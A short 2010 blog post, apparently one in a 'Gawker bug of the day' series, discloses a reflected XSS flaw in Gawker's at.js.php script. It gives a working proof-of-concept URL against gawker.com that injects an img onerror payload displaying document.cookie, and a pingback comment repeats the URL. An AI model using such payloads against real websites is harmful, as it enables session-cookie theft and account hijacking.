GBOTD #1: at.js.php XSS

For our first bug of the day, we need look no further than the first PHP script in the web root.

In fact, we don’t need to read more than 3 lines of code to find it. Unescaped user inputs are being echoed out to the page. This means XSS. This means pwnage.

http://gawker.com/at.js.php?country=%3Cimg%20src%3D.%20onerror%3Dalert%28document.cookie%29%20%3E

-mckt

This entry was posted on Tuesday, December 14th, 2010 at 11:14 pm and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response to GBOTD #1: at.js.php XSS

  1. Finding Security Bugs in Gawker Source Code | Security Generation says:
    December 15, 2010 at 5:08 am

    […] GBOTD#1 is a XSS found in the first 3 lines of the first file: http://gawker.com/at.js.php?country=%3Cimg%20src%3D.%20onerror%3Dalert%28document.cookie%29%20%3E […]

    Reply

Leave a comment